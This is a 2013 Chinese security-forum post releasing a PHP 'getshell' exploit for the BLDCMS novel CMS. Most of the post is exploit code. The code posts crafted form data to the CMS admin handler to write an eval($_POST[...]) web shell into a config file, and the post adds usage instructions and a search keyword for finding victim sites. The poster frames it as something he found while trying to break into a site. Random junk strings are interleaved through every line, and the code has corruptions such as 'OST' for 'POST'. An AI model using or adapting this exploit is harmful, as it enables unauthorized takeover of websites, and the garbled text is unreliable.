找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2177|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
- R7 i7 E6 [- U  m+ y, V! g
2 W' \! |' _# h% L( `. Z
8 z+ C5 q: o4 Y% W+ n. ?话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
* n: _4 d2 P; C& }: D! d 4 Q8 @+ N. ^3 h5 g/ I" q& K
既然都有人发了 我就把我之前写好的EXP放出来吧
" x7 J# [6 U9 D. a& f. w
4 g" _4 M( c" pview source print?01.php;">0 R$ s: E! Z5 }) f$ o4 V
02.<!--?php
+ _" s4 v* A1 \7 z% |) o03.echo "-------------------------------------------------------------------
  ^: W7 \! ?$ d% J) F04.
: P5 J: E, q! }" G8 b# i. A. I/ M05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
6 c7 t/ b! z5 t3 d. {; G* V  n06.
& z+ q, E4 v2 O07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
  }8 A/ `0 J& }4 t08.
, N: o/ x* K2 B# ?5 x09.QQ:981009941\r\n                                2013.3.21\r\n            
9 \, a1 t1 x9 j' i: _10.
/ n  ?7 w6 x, `% y3 Y8 z0 A5 O11. - `) t) t& w4 G& U4 Q, Z" U
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码. p+ }" ~: P9 S) i  d% b
13. ; P8 @" e' {7 D  z$ p" j
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------; k8 [' w8 r- h1 u; {) @
15.
5 e2 S0 R# }; j  N2 ]" n4 h16.--------------------------------------------------------------------\r\n";8 f$ k: A/ S( h0 k
17.$url=$argv[1];/ L1 U6 \) u% E
18.$dir=$argv[2];* y6 B# n( ?+ ]0 i7 r
19.$pass=$argv[3];; D) e# p- }4 ^3 c1 c
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';" y2 \$ W( k$ Y" @
21.if (emptyempty($pass)||emptyempty($url))2 ~. t% y" k) A- W# h' q
22.{exit("请输入参数");}- f6 Z( X% [/ s, K& \
23.else2 |# S$ |* r- d3 s
24.{
1 T1 P8 c' Y1 C* c25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev8 s. s$ y8 ?0 Q" {1 O/ s5 R
26.
2 q$ Y( O  }! f8 ^2 e27.al;
: z( |" |: g2 j  {) k! }+ y28.$length = strlen($fuckdata);
+ Y6 T6 X) N# S  w1 w3 P29.function getshell($url,$pass)! i( q* e' g7 }- j9 f
30.{4 f1 v, [4 F8 F. J4 u+ L) c
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
0 n2 B8 u& p; N) n% ^7 j7 C7 ]& }32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";) Y6 y3 g+ h" h' o6 A
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
4 B3 @9 f. ^3 v9 N% m0 o9 ^34.$header .= "User-Agent: MSIE\r\n";# }# f1 k7 `- K3 r
35.$header .= "Host:".$url."\r\n";
  Y: o5 \' E* ^  k3 e, g4 Y& j36.$header .= "Content-Length: ".$length."\r\n";! I. O/ p& N2 c" t, N
37.$header .= "Connection: Close\r\n";+ g/ b8 D, q# ~. e
38.$header .="\r\n";0 G- L: ?# g# q1 I9 X
39.$header .= $fuckdata."\r\n\r\n";
2 y3 P5 L5 f( r  F% |  f$ ^) w40.$fp = fsockopen($url, 80,$errno,$errstr,15);
: x1 J  ~5 q5 l8 C! G6 f: X/ m41.if (!$fp)  E+ J4 ^7 d* r: K5 T9 f
42.{
; W' U, c$ M3 n3 F- M' N, j43.exit ("利用失败:请检查指定目标是否能正常打开");3 E5 _  b7 j( o- R
44.}
% u: {' D, r7 O. c- P45.else{ if (!fputs($fp,$header))' {9 \- }7 G* T8 g6 q# X
46.{exit ("利用失败");}
  j& Q: W' ?, q' K7 \+ v47.else8 M9 B: x/ m1 k0 o
48.{
. L- p$ L2 j( \( L& A5 h! l; K49.$receive = '';
- l. |- C3 D( A% ~0 }7 g. q7 Z50.while (!feof($fp)) {
7 c% ^$ r2 M& x. B) J+ g51.$receive .= @fgets($fp, 1000);
- G+ v2 P3 q, X! n% y3 r! Q52.}, u; D6 ]) n/ k2 S- j6 a- Z: m
53.@fclose($fp);) Y8 Q  {2 I6 ?1 R6 s2 {# g
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
7 }4 l2 l8 [1 k# r+ r55.
9 s* W: T% }( x3 ~56.GPC是否=off)";# J% D  M9 m: Y0 x1 d0 Z* O7 z  ^
57.}}- X9 B: L8 O  s2 Y0 L
58.}
* }5 s& s; s8 w6 a  }+ R' g59.}
( F+ q. Z9 [2 U- e4 |9 Z- [60.getshell($url,$pass);
, D& W; g5 o' o. E# k7 u% Z, z61.?-->
. M" |& ^3 N8 `) Q
" S: t0 X% M. O' g8 t6 @' V, @9 ?
  p0 N. r( K7 G. J" n
by 数据流
: ?) v& V5 Z, ?( M8 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表